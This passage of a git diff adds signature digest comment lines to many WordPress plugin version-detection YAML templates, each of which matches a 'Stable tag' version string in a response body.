4a0a004730450220686fe2cc1d1be9539103dc74cc4bee7730dda7060e46c2f2d98b5148b93b21c8022100d5c791ebea56e6f33c778fc35ba9d78c71ace4fc67a443e3d7a5e28a283346af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..c8af5800ec 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100aa4f1bf1da25742f598d6fb987c080e09fe780c40ca5e41adbe9745f2964029a0221009ec475b4ed87aab7bf2fd0589e40819a09ff4cc332b8910bd98661099c1fe558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..3773283051 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d9514fe85da6636ea82824b5549b44d49fb749aeb80fc638a6252a537dad816b02201dbc39e0b40847e6c868c8be6250c732b730e1964c50bacd1ecdb10df561245b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..2aa65bc196 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200bdc40640a9e84eed009bdfb1e0322b52c0a0317773cfe3ad79f825fbf976f7f0221009823704ca3d196c66224fd548d727ece5400f4f3fb66c73a6860e295daf3f1a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..d709c52217 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207926be8588e1fb005a8401af0031599376609549e4468ce8fa24b8588181593d022100a10a0a594cf376956aed7d6dd13c2195b90740e54a7aef6026572ed3219717c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..d58811b2b2 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008f662888df0a2da8bb2a9626478edd3bff565fe29676b69e75f740a5e4020256022100bab59867e9552a2106cf9755f79fa5006d8c0021e4f49e432658cbfe1c31244f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..419b1b038d 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201f4e5e1ecce440cc84cf76cbb9c22250863d51a135464590f10d931795bfc2fa02200208c98dffa3a84ec1d6c370bf3bb39b530421167e1c8195cc85988effa262ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..4bfaebe064 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d55706a91ba516e9948723578fc58b7ee0cfa7c12ae29cd9e65789676ad2c79d022100f63f3b407150f40f5712a2d8cb4877e4cc9d59855e7be45a4ce49d5d2b55796f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..1be82048be 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b807fd4d3a115f3495a938b1f087506403feeb2dec0a0c9b99f9413fd9018083022100eeb1f342a863e766246199d042144b84df334270ca6054e2d8678d4a6601cf57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..361b7a4e45 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ff8f9c733ecf9fd4bff3a20c56945a9ef277d1345f815f84b5318a996fc2ce02022100dc5a39f9c0eb863ed0f5b011df5c47360f7ed013f823b7e6df04390dced89984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..3a98eddd8e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ec8ead359cf71e47c932b67d598e80f5b30d89faeb087746cce63fcbe259a577022100af5f2062017aa57b338f0812079c49c594571437adae342c6835bbe65569659d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..810ceb9b3c 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008ef13c796b46da0f618ef774d0ddb31c00537be2b196646c2c1c3dadfd507db502200a071fe205a9e3d377ecc7fde3760b65cd12102a69106cd5bbd7bd9b2164d1fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..09c3ee2725 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022040c6bf0d14acbdc357ceb9a605555df0497ff69fc2edfc2f7ad4a99a65f01c0e02207fd381c50ebf8a1c3259cc672c77ef30377146d3757b07946e58e68f1c1afe42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..f3e95d8317 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200ddc7b22008dd30b3c4ad2c2cf63ffe313934f985c637a3be4f7166a424876d5022033684bd2fafa32eea2727f6aa15f604f478b7af3bbbd1a8f5f57ab2c1b69c6ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..5a9b7f847a 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022058a5a85a87d18c0738d581eebf650b95e7405f3ff6c44a3de8eefb586b73ae8202207c431cde4a559c5e889cb8f15231a4b0cd70b992b6c06272a3e0b34214393ba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 97b7306b75..5df649e063 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210091550041992951441ec424c88635110a41b74b1fb134a75ad615c48143dff698022016e0e8711d2e6c3c411eb900c1158341d2168f86a61267d1edd24d234914cace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..1316075dd4 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b5d1c4fe8c4af5bd1986f767bc4c4bba1c8a789dbf6fefad86fdac714f939ef2022058ade8e5275e938ab907532324b7d874e51578be4f0d61834b52be0d56b0719b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..c975139942 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008b3a3d9ef0f8e58a1742e425293c48fd670bbfc855f339c3e734655efb7bca8f0221009eff20887a18d4cf124f354ac433406cfc851a5c056a438ce911bc55aa1f1137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..1f571957a5 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220537987128490f96c3d03e7a38f41007643cb0695ac78e2b5acc53110d69e47ed022100ebcd6a125a5f3c3f9f8af325bd93862258eb1ecd3455dae8e3cfa56742ed2abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..64559d42cc 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201aa3b8786cacdd93a30bcade032d76e3c95d2c7de5fca4f6cda2a8a45fbe80d7022007aeccddea9c08c9ef465c40fce1d99947e4ad5361c426ec9f711b8c58ca8698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..f6cfbc9a92 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205900bb1164ed80d9d7831803880ff733c0b473dcebf6b3bedbbb357d4c6e8de702205d330f3a7906d7734dd93141d663cdc00099a0ca33034fa3136d28aa329fadab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..6f21659506 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cbd72498db335a0d15b5a4d94a847e462d7354f418e233523bc88f3c4887174a022100ca6d55f57b8db985fbd2c354d522e02f20ebc627a16e5746d45540f8e326b259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..810b76aac3 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b4178e686941d9b13f8e0f2c8a8ac1171685865c712ca8dfeb525d57db3ec93b0220646845d165344fa2d20a1e86edce25ffc4d2cbf95add8e75f1da009a366fefe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..319f2c551d 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220409e3d5e0ff244121f95bd71f07338685c16bd0345df4605ea44974215c8c74a0220515d97612a50ae928d3baa49cb7905cd0a91789e7274fb0e021cb698536471a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..85972dfecb 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009d0c9ccd5fa970032db8b7b96b01afa59070df497281616f31f81c422e7951f302204de5b0a344e21185bf021c899d9ace1b8364afa66cf16e315d1047c14132c88c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..1d37e4042d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d717c86eb793b2cb17b922074620d8520e584c49a8dcd50afdf4f43eedc5614d022023dbcf1c4ee33fb395699075dbb002c3c425a2c717b02fee4ce316dd2bcff443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..5d25a323a6 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200cf1f3428579daca118d0a8c0f29d8fa19e9f4db8764f40a284a6f2538d7385402202694bb01d993b4dc2d8218c736edb0647040dce82fc1237cbb5f56613a6a34d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..355fe9112c 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210097d634783768699bedcc16519eb6d20efbb0557a8c25af447a282157082810fa022100c9535191aa279bf6d9dca2c8663473c222600cf79b04add3023da87b49a30379:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..0d278f3b81 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203096726eca21da71c9cc49547fd3ab82ab73c4a399b62c83f83bc78d2e215a010220709f4ced66cc17de530ff77e79172982351fd487540f07d2ac6e10bfb10b24dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index b6f392efba..b56a989fd9 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220776696b8fd36ebda6ed8cf5c21dc2d323b42a00d17d9c71183e5c4a675a7e26702200f1f5994e42b2c3a9175040935740dda519f196036f2b2da17db3166d308396e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..77c178206a 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022026288df1e53996c9148121e6d2737d44130f79daae4f8a94b78ad9fad48d87e102202501556520f9035eae1680ebddaef2a9c8fb207f46affafb6d6623ab2a234333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..04a91a1b2a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203b41aa7b8779ab204aa560f7c3d98720deb61a090edf93f8fb02a9b10bf950d80220511ded87aff1dfc3bfca5a578976ab2d5a572f344f2620ce38c6b104933bfaf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..ce63539005 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d64d8428768d2fbf8fe2bf8b832e18db1ae29b7e349788fd80fdd18e6bf70a4a02206111448a267ca44099b02fee633832b7618cf2e92fd904d10bc934c23059b9ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..f9662861c4 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e0d0627f0395af93bce89a5ae419b987b8b1e8b063c8d5395b7daa6a21df2506022100dd50f801c168e71bf2a7ee06d146a685265d6641d58324d38dc22fe008a415e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..be24e24f45 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009659cdecea0406f66a0720b8519661537ad660640e4825ead2b6315f9929572e02201aa72c62baeee1013bf09246c0c1ba8c142be7f868ffbff347ce361e427cddd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..0ca3ca0e3d 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206b81f051a82491593ea9f04e676fef464276575bb17cb923792835ac95e5b2b3022011899824a66393eb245caf5f697da5ec2094c1216f9a8e3019a8e2dad4ebe3c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..0cfd15b021 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202c5d39cd40a44e32e2f0f9d346c26005d00bf41377e9b08c8292434fbd63552b02206d9b4aae573ba6f2d4736f815a81a08860c8fabb970b3dc0f874a6ce48547185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..b2d5e2a618 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e3a441a8118c6ac3c98be59e0cbf2e5f5d418b542151eb0eeba62deb23db222b0220280a5db71704934362cd3cb8e12890296b497b27612eee9347109bc5e946685b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..b443d5c091 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fb7170cfcfc47c6480161de7f2a24e0d078c0e8122b8d789a9e86bd25c384715022075aed644265ef54338d88b2188009fd707ef01efb9b235a2223a67099019b5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..5fca4a91fa 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202487d127e36e3b1995da34ede8bc6de674f9b7c0c13f28c11d28522a89cf5de50221008c520b3264913e98810ffbaeb147eedaa68fe20ca66d8662b463042025a03c8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..7fba7e030a 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009069ce3cc76e476857f12f516345287c3afc1f2976058c93134ca592d715fbea02201302ebcf8475191c302fdc17205491dd9a8ec0152e47ed5ae40cdea87db4b93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..e9b660a54b 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220229d52d6bb102b142ff0a8559dca25f0736eab62b474943e15d5ab569e97bf6d022032b196e44b9ab140a3de6f19a36552beed08fe70338c4ce0cbff0934910b51d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..8b6c139037 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201a097237943b23d46b9b7eb28124f2e303b8ed6463187c4bcde70da28cf7494e022040219285a49fc071b4993b4b9b66540d6ea00a602b46bbccf8f3ae8cb4bcc7bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..cdbea42fc2 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022022b04d354c00397ee08646c722782c669b98f1b9c4ede990367a86586011b83c022100a4f9fb3b21aa5151edd28f0d048df1cb9206cdf66c89d81ae04456fd49f39de2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..229e1844aa 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100db39b7a17301966a55c632e417899d450c9ee990ecfa4486109e3bc19e9cbb2e022100dfbabf0780ef969ae25df2f24eaba35eeafe4e1720882dc19c475100c7dcd0f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..ed51865b72 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200ddeac4024946868919ff3aacb75339a3e30a9be7f6adb157d7cd684801248cb0220755c30ee9fd5d36022a4aaaa5e8a74f86386d0c5d8392c527c7881235292cc1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..3308b66272 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009c8cc48bb4d15d888c0b5e5399a1fa54b446b65fb391629cc4ae7aa5ef06867a022100ae48d47de4d6c2f43d1b92592998a4e1eccffa47ac1ae304565272d88a12d267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..b08562c340 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 